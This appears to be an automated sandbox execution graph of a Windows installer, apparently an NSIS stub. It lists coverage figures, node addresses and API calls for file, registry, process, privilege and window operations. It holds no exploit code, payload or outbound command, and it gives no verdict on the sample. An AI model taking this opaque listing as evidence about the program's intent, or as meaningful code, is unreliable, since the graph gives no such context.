                                                        Execution Graph

                                                        Execution Coverage:22.3%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16%
                                                        Total number of Nodes:1575
                                                        Total number of Limit Nodes:40
                                                        execution_graph 3940 401bc0 3941 401c11 3940->3941 3942 401bcd 3940->3942 3944 401c16 3941->3944 3945 401c3b GlobalAlloc 3941->3945 3943 4023af 3942->3943 3949 401be4 3942->3949 3946 4065b4 21 API calls 3943->3946 3953 401c56 3944->3953 3978 406577 lstrcpynW 3944->3978 3959 4065b4 3945->3959 3948 4023bc 3946->3948 3948->3953 3979 405bd7 3948->3979 3976 406577 lstrcpynW 3949->3976 3952 401c28 GlobalFree 3952->3953 3955 401bf3 3977 406577 lstrcpynW 3955->3977 3957 401c02 3983 406577 lstrcpynW 3957->3983 3962 4065bf 3959->3962 3960 406806 3961 40681f 3960->3961 4006 406577 lstrcpynW 3960->4006 3961->3953 3962->3960 3964 4067d7 lstrlenW 3962->3964 3968 4066d0 GetSystemDirectoryW 3962->3968 3969 4065b4 15 API calls 3962->3969 3970 4066e6 GetWindowsDirectoryW 3962->3970 3971 4065b4 15 API calls 3962->3971 3972 406778 lstrcatW 3962->3972 3975 406748 SHGetPathFromIDListW CoTaskMemFree 3962->3975 3984 406445 3962->3984 3989 40696b GetModuleHandleA 3962->3989 3995 406825 3962->3995 4004 4064be wsprintfW 3962->4004 4005 406577 lstrcpynW 3962->4005 3964->3962 3968->3962 3969->3964 3970->3962 3971->3962 3972->3962 3975->3962 3976->3955 3977->3957 3978->3952 3980 405bec 3979->3980 3981 405c38 3980->3981 3982 405c00 MessageBoxIndirectW 3980->3982 3981->3953 3982->3981 3983->3953 4007 4063e4 3984->4007 3987 406479 RegQueryValueExW RegCloseKey 3988 4064a9 3987->3988 3988->3962 3990 406991 GetProcAddress 3989->3990 3991 406987 3989->3991 3994 4069a0 3990->3994 4011 4068fb GetSystemDirectoryW 3991->4011 3993 40698d 3993->3990 3993->3994 3994->3962 4001 406832 3995->4001 3996 4068ad CharPrevW 3998 4068a8 3996->3998 3997 40689b CharNextW 3997->3998 3997->4001 3998->3996 4000 4068ce 3998->4000 4000->3962 4001->3997 4001->3998 4002 406887 CharNextW 4001->4002 4003 406896 CharNextW 4001->4003 4014 405e73 4001->4014 4002->4001 4003->3997 4004->3962 4005->3962 4006->3961 4008 4063f3 4007->4008 4009 4063fc RegOpenKeyExW 4008->4009 4010 4063f7 4008->4010 4009->4010 4010->3987 4010->3988 4012 40691d wsprintfW LoadLibraryExW 4011->4012 4012->3993 4015 405e79 4014->4015 4016 405e8f 4015->4016 4017 405e80 CharNextW 4015->4017 4016->4001 4017->4015 5073 402641 5074 402dcb 21 API calls 5073->5074 5075 402648 5074->5075 5078 406067 GetFileAttributesW CreateFileW 5075->5078 5077 402654 5078->5077 4034 4025c3 4046 402e0b 4034->4046 4038 4025d6 4039 4025e5 4038->4039 4044 402953 4038->4044 4040 4025f2 RegEnumKeyW 4039->4040 4041 4025fe RegEnumValueW 4039->4041 4042 40261a RegCloseKey 4040->4042 4041->4042 4043 402613 4041->4043 4042->4044 4043->4042 4047 402dcb 21 API calls 4046->4047 4048 402e22 4047->4048 4049 4063e4 RegOpenKeyExW 4048->4049 4050 4025cd 4049->4050 4051 402da9 4050->4051 4052 4065b4 21 API calls 4051->4052 4053 402dbe 4052->4053 4053->4038 4062 4015c8 4063 402dcb 21 API calls 4062->4063 4064 4015cf SetFileAttributesW 4063->4064 4065 4015e1 4064->4065 4066 401fc9 4067 402dcb 21 API calls 4066->4067 4068 401fcf 4067->4068 4081 4055fc 4068->4081 4072 402953 4074 402002 CloseHandle 4074->4072 4077 401ff4 4078 402004 4077->4078 4079 401ff9 4077->4079 4078->4074 4100 4064be wsprintfW 4079->4100 4082 405617 4081->4082 4091 401fd9 4081->4091 4083 405633 lstrlenW 4082->4083 4084 4065b4 21 API calls 4082->4084 4085 405641 lstrlenW 4083->4085 4086 40565c 4083->4086 4084->4083 4087 405653 lstrcatW 4085->4087 4085->4091 4088 405662 SetWindowTextW 4086->4088 4089 40566f 4086->4089 4087->4086 4088->4089 4090 405675 SendMessageW SendMessageW SendMessageW 4089->4090 4089->4091 4090->4091 4092 405b5a CreateProcessW 4091->4092 4093 401fdf 4092->4093 4094 405b8d CloseHandle 4092->4094 4093->4072 4093->4074 4095 406a16 WaitForSingleObject 4093->4095 4094->4093 4096 406a30 4095->4096 4097 406a42 GetExitCodeProcess 4096->4097 4101 4069a7 4096->4101 4097->4077 4100->4074 4102 4069c4 PeekMessageW 4101->4102 4103 4069d4 WaitForSingleObject 4102->4103 4104 4069ba DispatchMessageW 4102->4104 4103->4096 4104->4102 5082 73b0103d 5085 73b0101b 5082->5085 5092 73b015b6 5085->5092 5087 73b01020 5088 73b01024 5087->5088 5089 73b01027 GlobalAlloc 5087->5089 5090 73b015dd 3 API calls 5088->5090 5089->5088 5091 73b0103b 5090->5091 5094 73b015bc 5092->5094 5093 73b015c2 5093->5087 5094->5093 5095 73b015ce GlobalFree 5094->5095 5095->5087 4105 40254f 4106 402e0b 21 API calls 4105->4106 4107 402559 4106->4107 4108 402dcb 21 API calls 4107->4108 4109 402562 4108->4109 4110 40256d RegQueryValueExW 4109->4110 4113 402953 4109->4113 4111 40258d 4110->4111 4115 402593 RegCloseKey 4110->4115 4111->4115 4116 4064be wsprintfW 4111->4116 4115->4113 4116->4115 5096 40204f 5097 402dcb 21 API calls 5096->5097 5098 402056 5097->5098 5099 40696b 5 API calls 5098->5099 5100 402065 5099->5100 5101 402081 GlobalAlloc 5100->5101 5110 4020f1 5100->5110 5102 402095 5101->5102 5101->5110 5103 40696b 5 API calls 5102->5103 5104 40209c 5103->5104 5105 40696b 5 API calls 5104->5105 5106 4020a6 5105->5106 5106->5110 5111 4064be wsprintfW 5106->5111 5108 4020df 5112 4064be wsprintfW 5108->5112 5111->5108 5112->5110 5113 4021cf 5114 402dcb 21 API calls 5113->5114 5115 4021d6 5114->5115 5116 402dcb 21 API calls 5115->5116 5117 4021e0 5116->5117 5118 402dcb 21 API calls 5117->5118 5119 4021ea 5118->5119 5120 402dcb 21 API calls 5119->5120 5121 4021f4 5120->5121 5122 402dcb 21 API calls 5121->5122 5123 4021fe 5122->5123 5124 40223d CoCreateInstance 5123->5124 5125 402dcb 21 API calls 5123->5125 5128 40225c 5124->5128 5125->5124 5126 401423 28 API calls 5127 40231b 5126->5127 5128->5126 5128->5127 4148 403552 SetErrorMode GetVersionExW 4149 4035a6 GetVersionExW 4148->4149 4150 4035de 4148->4150 4149->4150 4151 403635 4150->4151 4152 40696b 5 API calls 4150->4152 4153 4068fb 3 API calls 4151->4153 4152->4151 4154 40364b lstrlenA 4153->4154 4154->4151 4155 40365b 4154->4155 4156 40696b 5 API calls 4155->4156 4157 403662 4156->4157 4158 40696b 5 API calls 4157->4158 4159 403669 4158->4159 4160 40696b 5 API calls 4159->4160 4161 403675 #17 OleInitialize SHGetFileInfoW 4160->4161 4236 406577 lstrcpynW 4161->4236 4164 4036c4 GetCommandLineW 4237 406577 lstrcpynW 4164->4237 4166 4036d6 4167 405e73 CharNextW 4166->4167 4168 4036fc CharNextW 4167->4168 4174 40370e 4168->4174 4169 403810 4170 403824 GetTempPathW 4169->4170 4238 403521 4170->4238 4172 40383c 4175 403840 GetWindowsDirectoryW lstrcatW 4172->4175 4176 403896 DeleteFileW 4172->4176 4173 405e73 CharNextW 4173->4174 4174->4169 4174->4173 4183 403812 4174->4183 4178 403521 12 API calls 4175->4178 4248 4030a2 GetTickCount GetModuleFileNameW 4176->4248 4180 40385c 4178->4180 4179 4038aa 4181 403961 4179->4181 4185 403951 4179->4185 4189 405e73 CharNextW 4179->4189 4180->4176 4182 403860 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4180->4182 4407 403b6f 4181->4407 4187 403521 12 API calls 4182->4187 4332 406577 lstrcpynW 4183->4332 4276 403c49 4185->4276 4191 40388e 4187->4191 4203 4038c9 4189->4203 4191->4176 4191->4181 4192 403ad3 4195 403b57 ExitProcess 4192->4195 4196 403adb GetCurrentProcess OpenProcessToken 4192->4196 4193 403aaf 4194 405bd7 MessageBoxIndirectW 4193->4194 4198 403abd ExitProcess 4194->4198 4199 403af3 LookupPrivilegeValueW AdjustTokenPrivileges 4196->4199 4200 403b27 4196->4200 4199->4200 4205 40696b 5 API calls 4200->4205 4201 403927 4333 405f4e 4201->4333 4202 40396a 4349 405b42 4202->4349 4203->4201 4203->4202 4208 403b2e 4205->4208 4211 403b43 ExitWindowsEx 4208->4211 4213 403b50 4208->4213 4211->4195 4211->4213 4414 40140b 4213->4414 4214 403989 4217 4039a1 4214->4217 4353 406577 lstrcpynW 4214->4353 4215 403946 4348 406577 lstrcpynW 4215->4348 4220 4039c7 wsprintfW 4217->4220 4229 4039f3 4217->4229 4221 4065b4 21 API calls 4220->4221 4221->4217 4224 403a03 GetFileAttributesW 4227 403a0f DeleteFileW 4224->4227 4224->4229 4225 403a3d SetCurrentDirectoryW 4400 406337 MoveFileExW 4225->4400 4227->4229 4229->4181 4229->4217 4229->4220 4229->4224 4229->4225 4231 406337 40 API calls 4229->4231 4232 4065b4 21 API calls 4229->4232 4233 405b5a 2 API calls 4229->4233 4234 403ac5 CloseHandle 4229->4234 4354 405acb CreateDirectoryW 4229->4354 4357 405b25 CreateDirectoryW 4229->4357 4360 405c83 4229->4360 4404 4068d4 FindFirstFileW 4229->4404 4231->4229 4232->4229 4233->4229 4234->4181 4236->4164 4237->4166 4239 406825 5 API calls 4238->4239 4241 40352d 4239->4241 4240 403537 4240->4172 4241->4240 4417 405e46 lstrlenW CharPrevW 4241->4417 4244 405b25 2 API calls 4245 403545 4244->4245 4246 406096 2 API calls 4245->4246 4247 403550 4246->4247 4247->4172 4420 406067 GetFileAttributesW CreateFileW 4248->4420 4250 4030e2 4270 4030f2 4250->4270 4421 406577 lstrcpynW 4250->4421 4252 403108 4422 405e92 lstrlenW 4252->4422 4256 403119 GetFileSize 4257 403130 4256->4257 4258 403213 4256->4258 4257->4258 4265 40327f 4257->4265 4257->4270 4272 40303e 6 API calls 4257->4272 4459 4034f4 4257->4459 4427 40303e 4258->4427 4260 40321c 4262 40324c GlobalAlloc 4260->4262 4260->4270 4462 40350a SetFilePointer 4260->4462 4438 40350a SetFilePointer 4262->4438 4267 40303e 6 API calls 4265->4267 4266 403267 4439 4032d9 4266->4439 4267->4270 4268 403235 4271 4034f4 ReadFile 4268->4271 4270->4179 4273 403240 4271->4273 4272->4257 4273->4262 4273->4270 4274 403273 4274->4270 4274->4274 4275 4032b0 SetFilePointer 4274->4275 4275->4270 4277 40696b 5 API calls 4276->4277 4278 403c5d 4277->4278 4279 403c63 4278->4279 4280 403c75 4278->4280 4479 4064be wsprintfW 4279->4479 4281 406445 3 API calls 4280->4281 4282 403ca5 4281->4282 4284 403cc4 lstrcatW 4282->4284 4286 406445 3 API calls 4282->4286 4285 403c73 4284->4285 4464 403f1f 4285->4464 4286->4284 4289 405f4e 18 API calls 4290 403cf6 4289->4290 4291 403d8a 4290->4291 4293 406445 3 API calls 4290->4293 4292 405f4e 18 API calls 4291->4292 4294 403d90 4292->4294 4295 403d28 4293->4295 4296 403da0 LoadImageW 4294->4296 4297 4065b4 21 API calls 4294->4297 4295->4291 4300 403d49 lstrlenW 4295->4300 4304 405e73 CharNextW 4295->4304 4298 403e46 4296->4298 4299 403dc7 RegisterClassW 4296->4299 4297->4296 4303 40140b 2 API calls 4298->4303 4301 403e50 4299->4301 4302 403dfd SystemParametersInfoW CreateWindowExW 4299->4302 4305 403d57 lstrcmpiW 4300->4305 4306 403d7d 4300->4306 4301->4181 4302->4298 4307 403e4c 4303->4307 4309 403d46 4304->4309 4305->4306 4310 403d67 GetFileAttributesW 4305->4310 4308 405e46 3 API calls 4306->4308 4307->4301 4311 403f1f 22 API calls 4307->4311 4312 403d83 4308->4312 4309->4300 4313 403d73 4310->4313 4314 403e5d 4311->4314 4480 406577 lstrcpynW 4312->4480 4313->4306 4316 405e92 2 API calls 4313->4316 4317 403e69 ShowWindow 4314->4317 4318 403eec 4314->4318 4316->4306 4319 4068fb 3 API calls 4317->4319 4472 4056cf OleInitialize 4318->4472 4322 403e81 4319->4322 4321 403ef2 4323 403ef6 4321->4323 4324 403f0e 4321->4324 4325 403e8f GetClassInfoW 4322->4325 4327 4068fb 3 API calls 4322->4327 4323->4301 4330 40140b 2 API calls 4323->4330 4326 40140b 2 API calls 4324->4326 4328 403ea3 GetClassInfoW RegisterClassW 4325->4328 4329 403eb9 DialogBoxParamW 4325->4329 4326->4301 4327->4325 4328->4329 4331 40140b 2 API calls 4329->4331 4330->4301 4331->4301 4332->4170 4492 406577 lstrcpynW 4333->4492 4335 405f5f 4493 405ef1 CharNextW CharNextW 4335->4493 4338 403933 4338->4181 4347 406577 lstrcpynW 4338->4347 4339 406825 5 API calls 4345 405f75 4339->4345 4340 405fa6 lstrlenW 4341 405fb1 4340->4341 4340->4345 4342 405e46 3 API calls 4341->4342 4344 405fb6 GetFileAttributesW 4342->4344 4343 4068d4 2 API calls 4343->4345 4344->4338 4345->4338 4345->4340 4345->4343 4346 405e92 2 API calls 4345->4346 4346->4340 4347->4215 4348->4185 4350 40696b 5 API calls 4349->4350 4351 40396f lstrlenW 4350->4351 4352 406577 lstrcpynW 4351->4352 4352->4214 4353->4217 4355 405b17 4354->4355 4356 405b1b GetLastError 4354->4356 4355->4229 4356->4355 4358 405b35 4357->4358 4359 405b39 GetLastError 4357->4359 4358->4229 4359->4358 4361 405f4e 18 API calls 4360->4361 4362 405ca3 4361->4362 4363 405cc2 4362->4363 4364 405cab DeleteFileW 4362->4364 4366 405ded 4363->4366 4499 406577 lstrcpynW 4363->4499 4365 405df9 4364->4365 4365->4229 4366->4365 4373 4068d4 2 API calls 4366->4373 4368 405ce8 4369 405cfb 4368->4369 4370 405cee lstrcatW 4368->4370 4372 405e92 2 API calls 4369->4372 4371 405d01 4370->4371 4374 405d11 lstrcatW 4371->4374 4375 405d07 4371->4375 4372->4371 4376 405e07 4373->4376 4377 405d1c lstrlenW FindFirstFileW 4374->4377 4375->4374 4375->4377 4376->4365 4378 405e0b 4376->4378 4379 405de2 4377->4379 4394 405d3e 4377->4394 4380 405e46 3 API calls 4378->4380 4379->4366 4381 405e11 4380->4381 4382 405c3b 5 API calls 4381->4382 4385 405e1d 4382->4385 4384 405dc5 FindNextFileW 4386 405ddb FindClose 4384->4386 4384->4394 4387 405e21 4385->4387 4388 405e37 4385->4388 4386->4379 4387->4365 4391 4055fc 28 API calls 4387->4391 4390 4055fc 28 API calls 4388->4390 4390->4365 4393 405e2e 4391->4393 4392 405c83 64 API calls 4392->4394 4396 406337 40 API calls 4393->4396 4394->4384 4394->4392 4395 4055fc 28 API calls 4394->4395 4398 4055fc 28 API calls 4394->4398 4399 406337 40 API calls 4394->4399 4500 406577 lstrcpynW 4394->4500 4501 405c3b 4394->4501 4395->4384 4397 405e35 4396->4397 4397->4365 4398->4394 4399->4394 4401 40634b 4400->4401 4403 403a4c CopyFileW 4400->4403 4512 4061bd 4401->4512 4403->4181 4403->4229 4405 4068f5 4404->4405 4406 4068ea FindClose 4404->4406 4405->4229 4406->4405 4408 403b87 4407->4408 4409 403b79 CloseHandle 4407->4409 4546 403bb4 4408->4546 4409->4408 4412 405c83 71 API calls 4413 403aa2 OleUninitialize 4412->4413 4413->4192 4413->4193 4415 401389 2 API calls 4414->4415 4416 401420 4415->4416 4416->4195 4418 405e62 lstrcatW 4417->4418 4419 40353f 4417->4419 4418->4419 4419->4244 4420->4250 4421->4252 4423 405ea0 4422->4423 4424 40310e 4423->4424 4425 405ea6 CharPrevW 4423->4425 4426 406577 lstrcpynW 4424->4426 4425->4423 4425->4424 4426->4256 4428 403047 4427->4428 4429 40305f 4427->4429 4430 403050 DestroyWindow 4428->4430 4431 403057 4428->4431 4432 403067 4429->4432 4433 40306f GetTickCount 4429->4433 4430->4431 4431->4260 4436 4069a7 2 API calls 4432->4436 4434 4030a0 4433->4434 4435 40307d CreateDialogParamW ShowWindow 4433->4435 4434->4260 4435->4434 4437 40306d 4436->4437 4437->4260 4438->4266 4441 4032f2 4439->4441 4440 403320 4443 4034f4 ReadFile 4440->4443 4441->4440 4463 40350a SetFilePointer 4441->4463 4444 40332b 4443->4444 4445 40348d 4444->4445 4446 40333d GetTickCount 4444->4446 4448 403477 4444->4448 4447 4034cf 4445->4447 4452 403491 4445->4452 4446->4448 4455 40338c 4446->4455 4450 4034f4 ReadFile 4447->4450 4448->4274 4449 4034f4 ReadFile 4449->4455 4450->4448 4451 4034f4 ReadFile 4451->4452 4452->4448 4452->4451 4453 406119 WriteFile 4452->4453 4453->4452 4454 4033e2 GetTickCount 4454->4455 4455->4448 4455->4449 4455->4454 4456 403407 MulDiv wsprintfW 4455->4456 4458 406119 WriteFile 4455->4458 4457 4055fc 28 API calls 4456->4457 4457->4455 4458->4455 4460 4060ea ReadFile 4459->4460 4461 403507 4460->4461 4461->4257 4462->4268 4463->4440 4465 403f33 4464->4465 4481 4064be wsprintfW 4465->4481 4467 403fa4 4482 403fd8 4467->4482 4469 403fa9 4470 403cd4 4469->4470 4471 4065b4 21 API calls 4469->4471 4470->4289 4471->4469 4485 404542 4472->4485 4474 4056f2 4478 405719 4474->4478 4488 401389 4474->4488 4475 404542 SendMessageW 4476 40572b OleUninitialize 4475->4476 4476->4321 4478->4475 4479->4285 4480->4291 4481->4467 4483 4065b4 21 API calls 4482->4483 4484 403fe6 SetWindowTextW 4483->4484 4484->4469 4486 40455a 4485->4486 4487 40454b SendMessageW 4485->4487 4486->4474 4487->4486 4490 401390 4488->4490 4489 4013fe 4489->4474 4490->4489 4491 4013cb MulDiv SendMessageW 4490->4491 4491->4490 4492->4335 4494 405f0e 4493->4494 4496 405f20 4493->4496 4494->4496 4497 405f1b CharNextW 4494->4497 4495 405f44 4495->4338 4495->4339 4496->4495 4498 405e73 CharNextW 4496->4498 4497->4495 4498->4496 4499->4368 4500->4394 4509 406042 GetFileAttributesW 4501->4509 4504 405c68 4504->4394 4505 405c56 RemoveDirectoryW 4507 405c64 4505->4507 4506 405c5e DeleteFileW 4506->4507 4507->4504 4508 405c74 SetFileAttributesW 4507->4508 4508->4504 4510 405c47 4509->4510 4511 406054 SetFileAttributesW 4509->4511 4510->4504 4510->4505 4510->4506 4511->4510 4513 406213 GetShortPathNameW 4512->4513 4514 4061ed 4512->4514 4516 406332 4513->4516 4517 406228 4513->4517 4539 406067 GetFileAttributesW CreateFileW 4514->4539 4516->4403 4517->4516 4519 406230 wsprintfA 4517->4519 4518 4061f7 CloseHandle GetShortPathNameW 4518->4516 4520 40620b 4518->4520 4521 4065b4 21 API calls 4519->4521 4520->4513 4520->4516 4522 406258 4521->4522 4540 406067 GetFileAttributesW CreateFileW 4522->4540 4524 406265 4524->4516 4525 406274 GetFileSize GlobalAlloc 4524->4525 4526 406296 4525->4526 4527 40632b CloseHandle 4525->4527 4528 4060ea ReadFile 4526->4528 4527->4516 4529 40629e 4528->4529 4529->4527 4541 405fcc lstrlenA 4529->4541 4532 4062b5 lstrcpyA 4535 4062d7 4532->4535 4533 4062c9 4534 405fcc 4 API calls 4533->4534 4534->4535 4536 40630e SetFilePointer 4535->4536 4537 406119 WriteFile 4536->4537 4538 406324 GlobalFree 4537->4538 4538->4527 4539->4518 4540->4524 4542 40600d lstrlenA 4541->4542 4543 406015 4542->4543 4544 405fe6 lstrcmpiA 4542->4544 4543->4532 4543->4533 4544->4543 4545 406004 CharNextA 4544->4545 4545->4542 4547 403bc2 4546->4547 4548 403bc7 FreeLibrary GlobalFree 4547->4548 4549 403b8c 4547->4549 4548->4548 4548->4549 4549->4412 5129 401a55 5130 402dcb 21 API calls 5129->5130 5131 401a5e ExpandEnvironmentStringsW 5130->5131 5132 401a72 5131->5132 5134 401a85 5131->5134 5133 401a77 lstrcmpW 5132->5133 5132->5134 5133->5134 4592 4014d7 4593 402da9 21 API calls 4592->4593 4594 4014dd Sleep 4593->4594 4596 402c4f 4594->4596 5140 4023d7 5141 4023e5 5140->5141 5142 4023df 5140->5142 5144 402dcb 21 API calls 5141->5144 5146 4023f3 5141->5146 5143 402dcb 21 API calls 5142->5143 5143->5141 5144->5146 5145 402401 5147 402dcb 21 API calls 5145->5147 5146->5145 5148 402dcb 21 API calls 5146->5148 5149 40240a WritePrivateProfileStringW 5147->5149 5148->5145 4602 402459 4603 402461 4602->4603 4604 40248c 4602->4604 4606 402e0b 21 API calls 4603->4606 4605 402dcb 21 API calls 4604->4605 4607 402493 4605->4607 4608 402468 4606->4608 4614 402e89 4607->4614 4610 402472 4608->4610 4611 4024a0 4608->4611 4612 402dcb 21 API calls 4610->4612 4613 402479 RegDeleteValueW RegCloseKey 4612->4613 4613->4611 4615 402e96 4614->4615 4616 402e9d 4614->4616 4615->4611 4616->4615 4618 402ece 4616->4618 4619 4063e4 RegOpenKeyExW 4618->4619 4620 402efc 4619->4620 4621 402fb1 4620->4621 4622 402f06 4620->4622 4621->4615 4623 402f0c RegEnumValueW 4622->4623 4624 402f2f 4622->4624 4623->4624 4625 402f96 RegCloseKey 4623->4625 4624->4625 4626 402f6b RegEnumKeyW 4624->4626 4627 402f74 RegCloseKey 4624->4627 4630 402ece 6 API calls 4624->4630 4625->4621 4626->4624 4626->4627 4628 40696b 5 API calls 4627->4628 4629 402f84 4628->4629 4631 402fa6 4629->4631 4632 402f88 RegDeleteKeyW 4629->4632 4630->4624 4631->4621 4632->4621 5150 40175a 5151 402dcb 21 API calls 5150->5151 5152 401761 SearchPathW 5151->5152 5153 40177c 5152->5153 5154 401d5d 5155 402da9 21 API calls 5154->5155 5156 401d64 5155->5156 5157 402da9 21 API calls 5156->5157 5158 401d70 GetDlgItem 5157->5158 5159 40265d 5158->5159 5160 402663 5161 402692 5160->5161 5162 402677 5160->5162 5164 4026c2 5161->5164 5165 402697 5161->5165 5163 402da9 21 API calls 5162->5163 5174 40267e 5163->5174 5167 402dcb 21 API calls 5164->5167 5166 402dcb 21 API calls 5165->5166 5168 40269e 5166->5168 5169 4026c9 lstrlenW 5167->5169 5177 406599 WideCharToMultiByte 5168->5177 5169->5174 5171 4026b2 lstrlenA 5171->5174 5172 40270c 5173 4026f6 5173->5172 5175 406119 WriteFile 5173->5175 5174->5172 5174->5173 5176 406148 5 API calls 5174->5176 5175->5172 5176->5173 5177->5171 5178 404f63 GetDlgItem GetDlgItem 5179 404fb5 7 API calls 5178->5179 5185 4051da 5178->5185 5180 40505c DeleteObject 5179->5180 5181 40504f SendMessageW 5179->5181 5182 405065 5180->5182 5181->5180 5183 40509c 5182->5183 5186 4065b4 21 API calls 5182->5186 5187 4044f6 22 API calls 5183->5187 5184 4052bc 5188 405368 5184->5188 5198 405315 SendMessageW 5184->5198 5221 4051cd 5184->5221 5185->5184 5217 405249 5185->5217 5232 404eb1 SendMessageW 5185->5232 5191 40507e SendMessageW SendMessageW 5186->5191 5192 4050b0 5187->5192 5189 405372 SendMessageW 5188->5189 5190 40537a 5188->5190 5189->5190 5195 4053a3 5190->5195 5200 405393 5190->5200 5201 40538c ImageList_Destroy 5190->5201 5191->5182 5197 4044f6 22 API calls 5192->5197 5193 4052ae SendMessageW 5193->5184 5194 40455d 8 API calls 5199 405569 5194->5199 5202 40551d 5195->5202 5225 4053de 5195->5225 5237 404f31 5195->5237 5208 4050c1 5197->5208 5203 40532a SendMessageW 5198->5203 5198->5221 5200->5195 5204 40539c GlobalFree 5200->5204 5201->5200 5206 40552f ShowWindow GetDlgItem ShowWindow 5202->5206 5202->5221 5209 40533d 5203->5209 5204->5195 5205 40519c GetWindowLongW SetWindowLongW 5207 4051b5 5205->5207 5206->5221 5210 4051d2 5207->5210 5211 4051ba ShowWindow 5207->5211 5208->5205 5213 405197 5208->5213 5216 405114 SendMessageW 5208->5216 5218 405152 SendMessageW 5208->5218 5219 405166 SendMessageW 5208->5219 5212 40534e SendMessageW 5209->5212 5231 40452b SendMessageW 5210->5231 5230 40452b SendMessageW 5211->5230 5212->5188 5213->5205 5213->5207 5216->5208 5217->5184 5217->5193 5218->5208 5219->5208 5221->5194 5222 4054e8 5223 4054f3 InvalidateRect 5222->5223 5226 4054ff 5222->5226 5223->5226 5224 40540c SendMessageW 5228 405422 5224->5228 5225->5224 5225->5228 5226->5202 5246 404e6c 5226->5246 5227 405496 SendMessageW SendMessageW 5227->5228 5228->5222 5228->5227 5230->5221 5231->5185 5233 404f10 SendMessageW 5232->5233 5234 404ed4 GetMessagePos ScreenToClient SendMessageW 5232->5234 5235 404f08 5233->5235 5234->5235 5236 404f0d 5234->5236 5235->5217 5236->5233 5249 406577 lstrcpynW 5237->5249 5239 404f44 5250 4064be wsprintfW 5239->5250 5241 404f4e 5242 40140b 2 API calls 5241->5242 5243 404f57 5242->5243 5251 406577 lstrcpynW 5243->5251 5245 404f5e 5245->5225 5252 404da3 5246->5252 5248 404e81 5248->5202 5249->5239 5250->5241 5251->5245 5253 404dbc 5252->5253 5254 4065b4 21 API calls 5253->5254 5255 404e20 5254->5255 5256 4065b4 21 API calls 5255->5256 5257 404e2b 5256->5257 5258 4065b4 21 API calls 5257->5258 5259 404e41 lstrlenW wsprintfW SetDlgItemTextW 5258->5259 5259->5248 4673 4015e6 4674 402dcb 21 API calls 4673->4674 4675 4015ed 4674->4675 4676 405ef1 4 API calls 4675->4676 4689 4015f6 4676->4689 4677 401656 4679 401688 4677->4679 4680 40165b 4677->4680 4678 405e73 CharNextW 4678->4689 4683 401423 28 API calls 4679->4683 4681 401423 28 API calls 4680->4681 4682 401662 4681->4682 4692 406577 lstrcpynW 4682->4692 4686 401680 4683->4686 4685 405b25 2 API calls 4685->4689 4687 405b42 5 API calls 4687->4689 4688 40166f SetCurrentDirectoryW 4688->4686 4689->4677 4689->4678 4689->4685 4689->4687 4690 40163c GetFileAttributesW 4689->4690 4691 405acb 2 API calls 4689->4691 4690->4689 4691->4689 4692->4688 5260 404666 lstrlenW 5261 404685 5260->5261 5262 404687 WideCharToMultiByte 5260->5262 5261->5262 5263 4049e7 5264 404a13 5263->5264 5265 404a24 5263->5265 5324 405bbb GetDlgItemTextW 5264->5324 5266 404a30 GetDlgItem 5265->5266 5273 404a8f 5265->5273 5268 404a44 5266->5268 5272 404a58 SetWindowTextW 5268->5272 5276 405ef1 4 API calls 5268->5276 5269 404b73 5322 404d22 5269->5322 5326 405bbb GetDlgItemTextW 5269->5326 5270 404a1e 5271 406825 5 API calls 5270->5271 5271->5265 5277 4044f6 22 API calls 5272->5277 5273->5269 5278 4065b4 21 API calls 5273->5278 5273->5322 5275 40455d 8 API calls 5280 404d36 5275->5280 5281 404a4e 5276->5281 5282 404a74 5277->5282 5283 404b03 SHBrowseForFolderW 5278->5283 5279 404ba3 5284 405f4e 18 API calls 5279->5284 5281->5272 5288 405e46 3 API calls 5281->5288 5285 4044f6 22 API calls 5282->5285 5283->5269 5286 404b1b CoTaskMemFree 5283->5286 5287 404ba9 5284->5287 5289 404a82 5285->5289 5290 405e46 3 API calls 5286->5290 5327 406577 lstrcpynW 5287->5327 5288->5272 5325 40452b SendMessageW 5289->5325 5293 404b28 5290->5293 5295 404b5f SetDlgItemTextW 5293->5295 5299 4065b4 21 API calls 5293->5299 5294 404a88 5297 40696b 5 API calls 5294->5297 5295->5269 5296 404bc0 5298 40696b 5 API calls 5296->5298 5297->5273 5306 404bc7 5298->5306 5300 404b47 lstrcmpiW 5299->5300 5300->5295 5302 404b58 lstrcatW 5300->5302 5301 404c08 5328 406577 lstrcpynW 5301->5328 5302->5295 5304 404c0f 5305 405ef1 4 API calls 5304->5305 5307 404c15 GetDiskFreeSpaceW 5305->5307 5306->5301 5310 405e92 2 API calls 5306->5310 5311 404c60 5306->5311 5309 404c39 MulDiv 5307->5309 5307->5311 5309->5311 5310->5306 5312 404e6c 24 API calls 5311->5312 5313 404cd1 5311->5313 5314 404cbe 5312->5314 5315 40140b 2 API calls 5313->5315 5316 404cf4 5313->5316 5317 404cd3 SetDlgItemTextW 5314->5317 5318 404cc3 5314->5318 5315->5316 5329 404518 KiUserCallbackDispatcher 5316->5329 5317->5313 5320 404da3 24 API calls 5318->5320 5320->5313 5321 404d10 5321->5322 5330 404940 5321->5330 5322->5275 5324->5270 5325->5294 5326->5279 5327->5296 5328->5304 5329->5321 5331 404953 SendMessageW 5330->5331 5332 40494e 5330->5332 5331->5322 5332->5331 5333 401c68 5334 402da9 21 API calls 5333->5334 5335 401c6f 5334->5335 5336 402da9 21 API calls 5335->5336 5337 401c7c 5336->5337 5338 401c91 5337->5338 5339 402dcb 21 API calls 5337->5339 5340 401ca1 5338->5340 5341 402dcb 21 API calls 5338->5341 5339->5338 5342 401cf8 5340->5342 5343 401cac 5340->5343 5341->5340 5344 402dcb 21 API calls 5342->5344 5345 402da9 21 API calls 5343->5345 5346 401cfd 5344->5346 5347 401cb1 5345->5347 5348 402dcb 21 API calls 5346->5348 5349 402da9 21 API calls 5347->5349 5350 401d06 FindWindowExW 5348->5350 5351 401cbd 5349->5351 5354 401d28 5350->5354 5352 401ce8 SendMessageW 5351->5352 5353 401cca SendMessageTimeoutW 5351->5353 5352->5354 5353->5354 5355 4028e9 5356 4028ef 5355->5356 5357 4028f7 FindClose 5356->5357 5358 402c4f 5356->5358 5357->5358 5359 405570 5360 405580 5359->5360 5361 405594 5359->5361 5362 405586 5360->5362 5363 4055dd 5360->5363 5364 40559c IsWindowVisible 5361->5364 5370 4055b3 5361->5370 5366 404542 SendMessageW 5362->5366 5365 4055e2 CallWindowProcW 5363->5365 5364->5363 5367 4055a9 5364->5367 5368 405590 5365->5368 5366->5368 5369 404eb1 5 API calls 5367->5369 